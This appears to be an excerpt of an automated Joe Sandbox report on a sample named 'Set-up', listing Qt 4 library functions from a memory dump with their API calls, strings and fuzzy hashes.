SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C148935
UnhandledExceptionFilter.KERNEL32(6C26276C), ref: 6C148940
_crt_debugger_hook.MSVCR100(00000001), ref: 6C148951
GetCurrentProcess.KERNEL32(C0000409), ref: 6C14895C
TerminateProcess.KERNEL32(00000000), ref: 6C148963

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
String ID:
API String ID: 3369434319-0
Opcode ID: 506c4e373f1705ad257b1c8381151b286c911589eb5b086d2066dd139eb209ed
Instruction ID: aa84c8af3d565c9402c017c4ed19a6ce0b27387cca7366c9e0797b01241f0a41
Opcode Fuzzy Hash: 506c4e373f1705ad257b1c8381151b286c911589eb5b086d2066dd139eb209ed
Instruction Fuzzy Hash: 9C21CEB9A11208DFDB50DF65D18864C7BBCBB0A319F00501AE9899BA40E770A7948F96

Function 6C0F2500 Relevance: 51.3, APIs: 34, Instructions: 272COMMON

Download Yara Rule

APIs

?isValid@QRect@@QBE_NXZ.QTCORE4 ref: 6C0F2541
??0?$QVector@VQPoint@@@@QAE@XZ.QTCORE4 ref: 6C0F2554
?updateScroll@QGraphicsViewPrivate@@QAEXXZ.QTGUI4 ref: 6C0F256B
?updateScroll@QGraphicsViewPrivate@@QAEXXZ.QTGUI4 ref: 6C0F258E
??0QPointF@@QAE@NN@Z.QTCORE4(?,?,?), ref: 6C0F25BD
?adjusted@QRect@@QBE?AV1@HHHH@Z.QTCORE4(?,00000000,00000000,00000001,00000001,?,?), ref: 6C0F25D5
?topLeft@QRect@@QBE?AVQPoint@@XZ.QTCORE4(?,?,?), ref: 6C0F25E7
??0QPointF@@QAE@ABVQPoint@@@Z.QTCORE4(00000000,?,?), ref: 6C0F25F2
??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6C0F2616
?topRight@QRect@@QBE?AVQPoint@@XZ.QTCORE4(?), ref: 6C0F2628
??0QPointF@@QAE@ABVQPoint@@@Z.QTCORE4(00000000), ref: 6C0F2633
??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6C0F2657
?p2@QLine@@QBE?AVQPoint@@XZ.QTCORE4(?), ref: 6C0F2669
??0QPointF@@QAE@ABVQPoint@@@Z.QTCORE4(00000000), ref: 6C0F2674
??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6C0F269B
?bottomLeft@QRect@@QBE?AVQPoint@@XZ.QTCORE4(?), ref: 6C0F26AD
??0QPointF@@QAE@ABVQPoint@@@Z.QTCORE4(00000000), ref: 6C0F26B8
??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6C0F26DC
??0?$QVector@VQPointF@@@@QAE@H@Z.QTCORE4(00000004), ref: 6C0F26E8

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$Rect@@$Point@@Point@@@$??0?$?top?updateGraphicsLeft@Private@@Scroll@Vector@View$?adjusted@?bottom?p2@F@@@@Line@@Point@@@@Right@Valid@
String ID:
API String ID: 3826106111-0
Opcode ID: b0f31f7b22cb36e01ec66076ad0c1a9a55438a5005cdf0ce89a4a8665ff2863d
Instruction ID: 53c6c94a96757a741a84b2f0e2433d8197ed8429bb287c7fe56ed93f12aa3b61
Opcode Fuzzy Hash: b0f31f7b22cb36e01ec66076ad0c1a9a55438a5005cdf0ce89a4a8665ff2863d
Instruction Fuzzy Hash: 28D13075208340CFC314DF54D498AAAFBF4FF89310F05885EE99A872A1DB30A959CF92

Function 6BD5A4F0 Relevance: 39.1, APIs: 26, Instructions: 116COMMON

Download Yara Rule

APIs

??0?$QVector@VQPoint@@@@QAE@XZ.QTCORE4(B6508C7A,?,?,00000000), ref: 6BD5A522
?reserve@?$QVector@VQPointF@@@@QAEXH@Z.QTCORE4 ref: 6BD5A537
?y@QPointF@@QBENXZ.QTCORE4 ref: 6BD5A542
?x@QPointF@@QBENXZ.QTCORE4(?,00000005), ref: 6BD5A550
??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6BD5A560
?append@?$QVector@VQPointF@@@@QAEXABVQPointF@@@Z.QTCORE4(00000000), ref: 6BD5A56F
?y@QPointF@@QBENXZ.QTCORE4 ref: 6BD5A573
?width@QRectF@@QBENXZ.QTCORE4 ref: 6BD5A581
?x@QPointF@@QBENXZ.QTCORE4 ref: 6BD5A58D
??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6BD5A5A1
?append@?$QVector@VQPointF@@@@QAEXABVQPointF@@@Z.QTCORE4(00000000), ref: 6BD5A5AA
?height@QRectF@@QBENXZ.QTCORE4 ref: 6BD5A5AE
?y@QPointF@@QBENXZ.QTCORE4 ref: 6BD5A5BA
?width@QRectF@@QBENXZ.QTCORE4 ref: 6BD5A5CC
?x@QPointF@@QBENXZ.QTCORE4 ref: 6BD5A5D8
??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6BD5A5EC
?append@?$QVector@VQPointF@@@@QAEXABVQPointF@@@Z.QTCORE4(00000000), ref: 6BD5A5F5
?height@QRectF@@QBENXZ.QTCORE4 ref: 6BD5A5F9
?y@QPointF@@QBENXZ.QTCORE4 ref: 6BD5A605
?x@QPointF@@QBENXZ.QTCORE4 ref: 6BD5A617
??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6BD5A627
?append@?$QVector@VQPointF@@@@QAEXABVQPointF@@@Z.QTCORE4(00000000), ref: 6BD5A630
?y@QPointF@@QBENXZ.QTCORE4 ref: 6BD5A634
?x@QPointF@@QBENXZ.QTCORE4 ref: 6BD5A642
??0QPointF@@QAE@NN@Z.QTCORE4 ref: 6BD5A652
?append@?$QVector@VQPointF@@@@QAEXABVQPointF@@@Z.QTCORE4(00000000), ref: 6BD5A65B

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$Vector@$F@@@@$?append@?$F@@@$Rect$?height@?width@$??0?$?reserve@?$Point@@@@
String ID:
API String ID: 1315155878-0
Opcode ID: 9dd027ca55fe525d67ffd9a161d7038fcc07020f69f4602419ad98c55caa6c5c
Instruction ID: c39704a4c4a55a406dc434add4250337e3d680abbb01f61eeca70de385ae72d0
Opcode Fuzzy Hash: 9dd027ca55fe525d67ffd9a161d7038fcc07020f69f4602419ad98c55caa6c5c
Instruction Fuzzy Hash: FC410C31704610CFDA04BFB9E99C52EBBB5FF8AA01F00495CE58682284DF354A35DBDA

Function 6BC4BFC0 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

??0QKeySequence@@QAE@XZ.QTGUI4(B6508C7A,00000000,?,?,?,?,?,00000000,?,?,?,?,?), ref: 6BC4BFF1

Part of subcall function 6BC4AC00: ??0QLatin1String@@QAE@PBD@Z.QTCORE4(00000000,B6508C7A,00000000,00000000,?,6C14D33E,000000FF,6BC4BFF6,B6508C7A,00000000,?,?,?,?,?,00000000), ref: 6BC4AC40
Part of subcall function 6BC4AC00: ??0QLatin1String@@QAE@PBD@Z.QTCORE4(00000001,?,?,00000000,?,?,?,?,?), ref: 6BC4AC4D
Part of subcall function 6BC4AC00: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,00000000,00000000,?,6C14D33E,000000FF,6BC4BFF6,B6508C7A,00000000,?,?,?,?,?,00000000,?), ref: 6BC4AC7E

?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,00000000,?,?,?,?,?,00000000,?,?,?,?,?), ref: 6BC4C014
??0QChar@@QAE@UQLatin1Char@@@Z.QTCORE4(00000026,?,00000000,00000001), ref: 6BC4C03B
?indexOf@QString@@QBEHVQChar@@HW4CaseSensitivity@Qt@@@Z.QTCORE4(?,00000000,00000001), ref: 6BC4C043
?size@QString@@QBEHXZ.QTCORE4(?,00000000,00000001), ref: 6BC4C052
??0QChar@@QAE@UQLatin1Char@@@Z.QTCORE4(00000026,?,00000000,00000001), ref: 6BC4C06A
?at@QString@@QBE?BVQChar@@H@Z.QTCORE4(?,00000001,?,00000000,00000001), ref: 6BC4C078
?unicode@QChar@@QAEAAGXZ.QTCORE4(?,00000000,00000001), ref: 6BC4C08A
?unicode@QChar@@QAEAAGXZ.QTCORE4(?,00000000,00000001), ref: 6BC4C096
?at@QString@@QBE?BVQChar@@H@Z.QTCORE4(?,00000001,?,00000000,00000001), ref: 6BC4C0AD
?isPrint@QChar@@QBE_NXZ.QTCORE4(?,00000000,00000001), ref: 6BC4C0B7
?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,00000000,00000001), ref: 6BC4C0D4
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,00000000,00000001), ref: 6BC4C0E9
??3@YAXPAX@Z.MSVCR100(?,?,00000000,00000001), ref: 6BC4C0F4
?toUpper@QChar@@QBE?AV1@XZ.QTCORE4(?,?,00000000,00000001), ref: 6BC4C11B
?unicode@QChar@@QAEAAGXZ.QTCORE4(?,00000000,00000001), ref: 6BC4C12D
??0QKeySequence@@QAE@HHHH@Z.QTGUI4(?,00000000,00000000,00000000,?,00000000,00000001), ref: 6BC4C147

Part of subcall function 6BC4ACA0: ??2@YAPAXI@Z.MSVCR100(00000014,B6508C7A,?,00000001,00000026,?,00000000,6C15710B,000000FF,6BC4C14C,?,00000000,00000000,00000000,?,00000000), ref: 6BC4ACC8
Part of subcall function 6BC4ACA0: ??0QLatin1String@@QAE@PBD@Z.QTCORE4(00000000), ref: 6BC4ACE3
Part of subcall function 6BC4ACA0: ??0QLatin1String@@QAE@PBD@Z.QTCORE4(00000001), ref: 6BC4ACED

?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,00000000,00000000,00000000,?,00000000,00000001), ref: 6BC4C15C
??3@YAXPAX@Z.MSVCR100(?,?,00000000,00000000,00000000,?,00000000,00000001), ref: 6BC4C16F

Strings

&, xrefs: 6BC4C05C
&, xrefs: 6BC4C027

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Char@@$String@@$Latin1$AtomicBasicInt@@$?ref@?unicode@$??3@?at@?deref@Char@@@Sequence@@$??2@?index?size@CasePrint@Qt@@@Sensitivity@Upper@
String ID: &$&
API String ID: 1974498996-3764684571
Opcode ID: 074de07568ca9452e8408a31e7cecf086ef03175e7dab241f3a2f5af92d27660
Instruction ID: b6ac340ae0c43b1574a4617f15985ec7612293cd85681c5cd07a9feff0c85805
Opcode Fuzzy Hash: 074de07568ca9452e8408a31e7cecf086ef03175e7dab241f3a2f5af92d27660
Instruction Fuzzy Hash: E1515C766182019FDB049F54D44466FBBF9FF8AB08F04494DF88693390EB35AB09CB96

Function 6BC66DA0 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 125windowCOMMON

Download Yara Rule

APIs

??0QObjectPrivate@@QAE@H@Z.QTCORE4(?,B6508C7A,?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000), ref: 6BC66DD0
??0QRegion@@QAE@XZ.QTGUI4(?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000,00000000,6C18B198), ref: 6BC66E14

Part of subcall function 6BD6CF40: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(00000000,6BC66E19,?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000), ref: 6BD6CF4E

??0QRegion@@QAE@XZ.QTGUI4(?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000,00000000,6C18B198), ref: 6BC66E24
??0QString@@QAE@XZ.QTCORE4(?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000,00000000,6C18B198), ref: 6BC66E34
??0QString@@QAE@XZ.QTCORE4(?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000,00000000,6C18B198), ref: 6BC66E45
??0QString@@QAE@XZ.QTCORE4(?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000,00000000,6C18B198), ref: 6BC66E56
??0QString@@QAE@XZ.QTCORE4(?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000,00000000,6C18B198), ref: 6BC66E67
??0QString@@QAE@XZ.QTCORE4(?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000,00000000,6C18B198), ref: 6BC66E78
??0QRect@@QAE@XZ.QTCORE4(?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000,00000000,6C18B198), ref: 6BC66EBB
??0QPalette@@QAE@XZ.QTGUI4(?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000,00000000,6C18B198), ref: 6BC66EC4
??0QFont@@QAE@XZ.QTGUI4(?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000,00000000,6C18B198), ref: 6BC66ED1
??0QRect@@QAE@XZ.QTCORE4(?,00000000,?,?,00000000,?,6C14F56B,000000FF,6BF15C33,00040805,B6508C7A,?,?,00000000,00000000,6C18B198), ref: 6BC66EDE
??0QLocale@@QAE@XZ.QTCORE4 ref: 6BC66EF9
??0QPoint@@QAE@XZ.QTCORE4 ref: 6BC66F05
?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6BC66F17
?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6BC66F31
?instance@QCoreApplication@@SAPAV1@XZ.QTCORE4 ref: 6BC66F5B
?qFatal@@YAXPBDZZ.QTCORE4(QWidget: Must construct a QApplication before a QPaintDevice), ref: 6BC66F6A
?qFatal@@YAXPBDZZ.QTCORE4(Cannot mix incompatible Qt libraries), ref: 6BC66F82

Strings

Cannot mix incompatible Qt libraries, xrefs: 6BC66F7D
QWidget: Must construct a QApplication before a QPaintDevice, xrefs: 6BC66F65

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: String@@$?ref@AtomicBasicInt@@$Fatal@@Rect@@Region@@$?instance@Application@@CoreFont@@Locale@@ObjectPalette@@Point@@Private@@
String ID: Cannot mix incompatible Qt libraries$QWidget: Must construct a QApplication before a QPaintDevice
API String ID: 130500769-2489863770
Opcode ID: f3668880b1435c9491262ce7051fb1cc9153a69d2ed46e19f61e2ef151f11906
Instruction ID: 4f4969c1e0bb9fa803460386288bc7c121180938b74f3b150c941e52b1160ea7
Opcode Fuzzy Hash: f3668880b1435c9491262ce7051fb1cc9153a69d2ed46e19f61e2ef151f11906
Instruction Fuzzy Hash: 1E51C470504B85CFD724CF69C48879AFBE4BF59308F404A2DD5DE82641EB78A218CB66

Function 6C0F21F0 Relevance: 34.7, APIs: 23, Instructions: 152COMMON

Download Yara Rule

APIs

?viewport@QAbstractScrollArea@@QBEPAVQWidget@@XZ.QTGUI4 ref: 6C0F2200
?width@QRect@@QBEHXZ.QTCORE4 ref: 6C0F220B
?viewport@QAbstractScrollArea@@QBEPAVQWidget@@XZ.QTGUI4 ref: 6C0F221F
?height@QRect@@QBEHXZ.QTCORE4 ref: 6C0F222A
?mapRect@QTransform@@QBE?AVQRectF@@ABV2@@Z.QTGUI4(?,6BC13824), ref: 6C0F224B
?updateScroll@QGraphicsViewPrivate@@QAEXXZ.QTGUI4 ref: 6C0F225B

Part of subcall function 6C0F0D30: ?layoutDirection@QWidget@@QBE?AW4LayoutDirection@Qt@@XZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0D51
Part of subcall function 6C0F0D30: ?wizard@QWizardPage@@IBEPAVQWizard@@XZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0D72
Part of subcall function 6C0F0D30: ?orientation@QSplitterHandle@@QBE?AW4Orientation@Qt@@XZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0D8A
Part of subcall function 6C0F0D30: ?value@QAbstractSlider@@QBEHXZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0DA2
Part of subcall function 6C0F0D30: ?value@QAbstractSlider@@QBEHXZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0DD4

?updateScroll@QGraphicsViewPrivate@@QAEXXZ.QTGUI4 ref: 6C0F227D
?x@QPointF@@QBENXZ.QTCORE4 ref: 6C0F229F
?x@QPointF@@QBENXZ.QTCORE4 ref: 6C0F22CB
?repeatAction@QAbstractSlider@@IBE?AW4SliderAction@1@XZ.QTGUI4(00000000), ref: 6C0F22E3
?setValue@QAbstractSlider@@QAEXH@Z.QTGUI4(00000000), ref: 6C0F22EA
?right@QRectF@@QBENXZ.QTCORE4 ref: 6C0F22F3
?right@QRectF@@QBENXZ.QTCORE4 ref: 6C0F231F
?repeatAction@QAbstractSlider@@IBE?AW4SliderAction@1@XZ.QTGUI4(00000000), ref: 6C0F233B
?setValue@QAbstractSlider@@QAEXH@Z.QTGUI4(00000000), ref: 6C0F2342
?y@QPointF@@QBENXZ.QTCORE4 ref: 6C0F2352
?y@QPointF@@QBENXZ.QTCORE4 ref: 6C0F237E
?verticalScrollBar@QAbstractScrollArea@@QBEPAVQScrollBar@@XZ.QTGUI4(00000000), ref: 6C0F2396
?setValue@QAbstractSlider@@QAEXH@Z.QTGUI4(00000000), ref: 6C0F239D
?bottom@QRectF@@QBENXZ.QTCORE4 ref: 6C0F23A6
?bottom@QRectF@@QBENXZ.QTCORE4 ref: 6C0F23D2
?verticalScrollBar@QAbstractScrollArea@@QBEPAVQScrollBar@@XZ.QTGUI4(00000000), ref: 6C0F23EE
?setValue@QAbstractSlider@@QAEXH@Z.QTGUI4(00000000), ref: 6C0F23F5

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Abstract$ScrollSlider@@$Rect$?setArea@@PointValue@$Widget@@$?bottom@?repeat?right@?update?value@?vertical?viewport@Action@Action@1@Bar@Bar@@Direction@GraphicsPrivate@@Qt@@Rect@@Scroll@SliderView$?height@?layout?map?orientation@?width@?wizard@Handle@@LayoutOrientation@Page@@Rect@SplitterTransform@@V2@@WizardWizard@@
String ID:
API String ID: 87412840-0
Opcode ID: d74b7f4e32e357a9424e46409a8b5c06cadf4d04cf5ce62dc4c88ea4a48881fd
Instruction ID: 5ec0acf62bf26d5ed70b7d943544b21b8bae52c454d6cf8bb0996c8cbdd0390b
Opcode Fuzzy Hash: d74b7f4e32e357a9424e46409a8b5c06cadf4d04cf5ce62dc4c88ea4a48881fd
Instruction Fuzzy Hash: 85516870108B4A9BCB049F21E95C79EBBB4FFC6304F404D5DE5EA421A4CF3595AADB42

Function 6C0DB860 Relevance: 24.1, APIs: 16, Instructions: 137COMMON

Download Yara Rule

APIs

??0QRectF@@QAE@XZ.QTCORE4(B6508C7A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0DB893
?items@QGraphicsScene@@QBE?AV?$QList@PAVQGraphicsItem@@@@XZ.QTGUI4(?,?,?,?,?,?,?,?,?,?,?,?,6C1A62A0,000000FF,6C0E0162,?), ref: 6C0DB8A0

Part of subcall function 6BF3BB90: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,?,6C181C98,000000FF,6C0DAE15,?,?), ref: 6BF3BBC6
Part of subcall function 6BF3BB90: ?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,?,?,6C181C98,000000FF), ref: 6BF3BBF0
Part of subcall function 6BF3BB90: ?end@QListData@@QBEPAPAXXZ.QTCORE4(?,?,?,6C181C98,000000FF), ref: 6BF3BBFB

?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6C0DB8C0
?qFree@@YAXPAX@Z.QTCORE4(?), ref: 6C0DB8D5
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6C0DB909
?qFree@@YAXPAX@Z.QTCORE4(?), ref: 6C0DB918
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6C0DB93A
?qFree@@YAXPAX@Z.QTCORE4(?), ref: 6C0DB949
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0DB95E
?qFree@@YAXPAX@Z.QTCORE4(?,?,?,?,?,?), ref: 6C0DB96D
?sceneBoundingRect@QGraphicsItem@@QBE?AVQRectF@@XZ.QTGUI4(?,?,?,?,?,?,?), ref: 6C0DB97D
??_5QRectF@@QAEAAV0@ABV0@@Z.QTCORE4(00000000,?,?,?,?,?,?), ref: 6C0DB987
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6C0DB99D
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6C0DB9C2
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6C0DB9E6
?qFree@@YAXPAX@Z.QTCORE4(?), ref: 6C0DB9F5

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: AtomicBasicInt@@$?deref@$Free@@$GraphicsRect$Data@@List$??_5?begin@?end@?items@?ref@?sceneBoundingItem@@Item@@@@List@Rect@Scene@@V0@@
String ID:
API String ID: 4007367255-0
Opcode ID: de1979fb32574025f0c44180806d335bc872841d719ca1ccc82bde2ace47e256
Instruction ID: 3da4ca84a322f8280728195a290c6aeefcc09d658cbba125e1e54a8c17a11127
Opcode Fuzzy Hash: de1979fb32574025f0c44180806d335bc872841d719ca1ccc82bde2ace47e256
Instruction Fuzzy Hash: 9B519D716083809FCB04CF64D899B5EB7F8AF85B68F144A1CF4A687291CB34E945CB96

Function 6C0F50B0 Relevance: 24.1, APIs: 16, Instructions: 118COMMON

Download Yara Rule

APIs

?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6C0F5102
?type@QTransform@@QBE?AW4TransformationType@1@XZ.QTGUI4 ref: 6C0F5120
?y@QRect@@QBEHXZ.QTCORE4(00000001,00000001), ref: 6C0F5137
?x@QPoint@@QBEHXZ.QTCORE4(00000000), ref: 6C0F5140
?mapToScene@QGraphicsView@@QBE?AVQPolygonF@@HHHH@Z.QTGUI4(?,00000000), ref: 6C0F514E
?viewportTransform@QGraphicsView@@QBE?AVQTransform@@XZ.QTGUI4(?,?,00000000), ref: 6C0F516D
?items@QGraphicsScene@@QBE?AV?$QList@PAVQGraphicsItem@@@@ABVQPolygonF@@W4ItemSelectionMode@Qt@@W4SortOrder@5@ABVQTransform@@@Z.QTGUI4(?,00000000,00000001,00000001,00000000,?,?,00000000), ref: 6C0F5182
??1?$QVector@VQPointF@@@@QAE@XZ.QTCORE4(?,00000000,00000001,00000001,00000000,?,?,00000000), ref: 6C0F519B

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Graphics$PolygonTransform@@View@@$??1?$?items@?map?ref@?type@?viewportAtomicBasicF@@@@Int@@ItemItem@@@@List@Mode@Order@5@PointPoint@@Qt@@Rect@@Scene@Scene@@SelectionSortTransform@Transform@@@TransformationType@1@Vector@
String ID:
API String ID: 813240382-0
Opcode ID: b9d2e1a2d33cb1d43adfb00e3c5c30ae523ac5e8445eb8cb31cef0e446432951
Instruction ID: 4a7af4c6c260ab742db49892c9e1838c83efd77ee3f9a06effc8e82ec3c88b61
Opcode Fuzzy Hash: b9d2e1a2d33cb1d43adfb00e3c5c30ae523ac5e8445eb8cb31cef0e446432951
Instruction Fuzzy Hash: 5A4171312083409FDB24DB64D554BEFB7F9FF89714F00491DE99993280DB7469498B92

Function 6BC6DFB0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

?qWarning@@YAXPBDZZ.QTCORE4(QWidget::insertAction: Attempt to insert null action,B6508C7A), ref: 6BC6DFE6
?begin@QListData@@QBEPAPAXXZ.QTCORE4(B6508C7A), ref: 6BC6DFFF
?end@QListData@@QBEPAPAXXZ.QTCORE4 ref: 6BC6E009
